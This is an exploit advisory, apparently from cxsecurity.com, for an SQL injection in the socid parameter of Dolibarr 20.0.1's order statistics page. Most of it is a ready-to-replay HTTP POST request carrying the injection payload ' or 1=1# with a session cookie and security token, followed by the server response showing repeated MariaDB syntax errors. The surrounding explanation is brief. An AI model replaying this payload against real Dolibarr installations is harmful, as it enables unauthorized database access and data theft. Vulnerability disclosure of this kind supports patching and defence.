dolibarr 20.0.1 Multiple security token SQLi

2024.10.16
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

## Titles: dolibarr 20.0.1 Multiple security token SQLi ## Author: nu11secur1ty ## Date: 10/15/2024 ## Vendor: https://www.dolibarr.org/ ## Software: https://www.dolibarr.org/downloads.php ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `socid` parameter appears to be vulnerable to SQL injection attacks. The attacker can get sensitive information for the MySQL database from this system when he attacks it online from inside! He can do this, by using a vulnerable security token to access the web application! STATUS: Medium- Vulnerability [+]Exploits: - SQLi Multiple: ``` POST /dolibarr-20.0.1/htdocs/commande/stats/index.php HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate, br Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: DOLSESSID_0297178cd410ba92966a17032c81774a6acb1ec7=hsq658oejrct1401omd4nf2c5q Origin: http://pwnedhost.com Upgrade-Insecure-Requests: 1 Referer: http://pwnedhost.com/dolibarr-20.0.1/htdocs/commande/stats/index.php?leftmenu=orders_suppliers&mode=supplier Content-Type: application/x-www-form-urlencoded Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 357 token=ac1770a37880433e4ca36f69be4a8bf2&mode=supplier&socid=-1nu11secur1ty'%20or%201%3d1%23&typent_id=-1&categ_id=-1&userid=1&object_status_multiselect=1&object_status%5B%5D=0&object_status%5B%5D=1&object_status%5B%5D=2&object_status%5B%5D=3&object_status%5B%5D=4&object_status%5B%5D=5&object_status%5B%5D=6%2C7&object_status%5B%5D=9&year=2024&submit=Refresh ``` [+]Response: ```SQLi HTTP/1.1 200 OK Date: Tue, 15 Oct 2024 10:23:43 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 80974 <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="robots" content="noindex,nofollow"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="author ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-31 23:59:59'...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-31 23:59:59'...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-31 23:59:59'...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-31 2...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-31 2...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-31 2...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-31 2...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-31 2...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-31 2...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') as total, AVG() as avg FROM WHERE c.entity IN (1) AND c.fk_user_author = 1...' at line 1<b ``` ## Reproduce: [href](https://www.patreon.com/posts/dolibarr-20-0-1-114038337) ## Demo PoC: [href](https://www.nu11secur1ty.com/2024/10/dolibarr-2001-multiple-security-token.html) ## Time spent: 05:27:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top